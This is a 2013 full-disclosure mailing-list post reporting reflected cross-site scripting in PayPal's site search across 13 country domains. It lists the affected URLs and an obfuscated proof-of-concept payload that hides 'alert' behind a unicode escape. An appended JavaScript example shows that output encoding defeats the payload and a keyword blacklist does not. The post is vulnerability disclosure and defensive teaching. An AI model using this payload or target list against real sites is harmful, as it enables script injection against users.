
List:       full-disclosure
Subject:    [Full-disclosure] 13 more XSS on Paypal
From:       John Parker <unownsec () gmail ! com>
Date:       2013-05-28 7:40:28
Message-ID: CAPDA3VQF+wFHsi68-MEYG6PhKBJV-59908vaOvRpozOakA07uw () mail ! gmail ! com


Dear Sir,

I recently found out 13 more XSS vulnerabilities and Paypal shows no
response. I am not a bad guy. But please make them aware of this issue
before any skid plays with this.

Regards,
Un0wn_X



["pay.txt" (text/plain)]

Hello, I saw the PayPal XSS vulnerability and I researched more and more. I found out that 13 more countries are affected by this XSS attack.

https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search


XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img>

Image: http://www.anony.ws/i/2013/05/26/NTuWS.png

I reported them and I did not get any reply. Please make them aware of this vulnerability. I am giving this out for awareness.

Researcher: Un0wn_X
Email: unonwsec@gmail.com
Follow @UnownSec
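The payload quoted in the advisory avoids the literal string "alert" by spelling the identifier as `window['al\u0065rt']`, which the browser decodes only once the handler executes. The following is an added example, not part of the original post and not PayPal's code: it shows the mitigation that actually closes a reflected XSS in a search page (context-aware HTML output encoding of the echoed parameter) beside a keyword blacklist of the kind developers sometimes reach for, and a small tag-listing check that lets you confirm the encoded output can no longer open an element. The function and variable names are illustrative; the sample input is the payload from this post, embedded as a constructed test value.

```javascript
// Added example (not from the original post): output encoding for a reflected
// search parameter, with a check that shows why keyword blacklisting fails.

// Constructed sample input: the payload quoted in the advisory, as it would arrive
// in a query-string parameter. String.raw keeps the "\u0065" escape literal, exactly
// as the server would receive it.
const SAMPLE_QUERY = String.raw`<img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img>`;

// Escape the characters that can break out of an HTML text node or a quoted
// attribute value. This is the fix: the browser then renders the payload as text.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// How a safe template echoes the search term back into the results page.
function renderSearchHeader(query) {
  return `<h2>Results for "${htmlEncode(query)}"</h2>`;
}

// A naive blacklist: block requests whose raw input contains "alert(".
// The advisory's payload never contains that substring, so this lets it through.
function naiveBlacklistBlocks(input) {
  return /alert\s*\(/i.test(input);
}

// List the element names that a fragment can open when inserted into HTML.
// Anything other than the template's own tags means the input was not encoded.
function listTags(fragment) {
  return Array.from(fragment.matchAll(/<([a-z][\w-]*)/gi), (m) => m[1].toLowerCase());
}

// Stand-alone demonstration.
console.log('blacklist blocks payload:', naiveBlacklistBlocks(SAMPLE_QUERY)); // false
console.log('tags in raw input:', listTags(SAMPLE_QUERY));                      // [ 'img' ]
console.log('tags in rendered page:', listTags(renderSearchHeader(SAMPLE_QUERY))); // [ 'h2' ]
```

The contrast is the point: the blacklist reports nothing while the raw input opens an `img` element with an event handler, whereas the encoded header contains only the template's own `h2`. Encoding at the output context, rather than pattern-matching the input, is what makes the 13 country-specific search pages in this post behave identically regardless of how the payload is obfuscated.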



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
